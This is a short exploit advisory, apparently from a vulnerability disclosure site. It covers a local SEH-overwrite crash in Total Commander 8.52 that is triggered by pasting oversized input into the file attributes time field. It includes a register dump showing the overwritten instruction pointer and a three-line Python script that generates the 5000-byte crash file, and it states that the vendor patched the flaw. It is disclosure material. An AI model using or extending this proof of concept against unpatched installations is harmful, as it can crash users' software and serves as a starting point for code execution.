Total Commander 32bit SEH Overwrite

2015.09.16
Credit: Un_N0n
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

''' ******************************************************************************************** # Exploit Title: Total Commander 32bit SEH Overwrite. # Date: 8/27/2015 # Exploit Author: Un_N0n # Software Vendor: http://www.ghisler.com/ # Software Link: http://www.ghisler.com/download.htm # Version: 8.52 # Tested on: Windows 8 x64(64 BIT) ******************************************************************************************** [Info:] EAX 00106541 ECX FFFFFEFA EDX 0031E941 EBX 04921F64 ESP 001065FC EBP 41414141 ESI 04930088 EDI 0031E9B0 EIP 41414141 SEH chain of main thread, item 0 Address=001065FC SE handler=41414141 ''' [Steps to Produce the Crash]: 1- Open up 'TOTALCMD.EXE'. 2- Goto Files -> Change Attributes. 3- In time field paste in contents of 'Crash.txt'. ~ Software will crash b/c SEH Overwrite. [Code for CRASH.txt] file = open("crash.txt",'w') file.write("A"*5000) file.close() ->After Reporting, Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]). **********************************************************************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top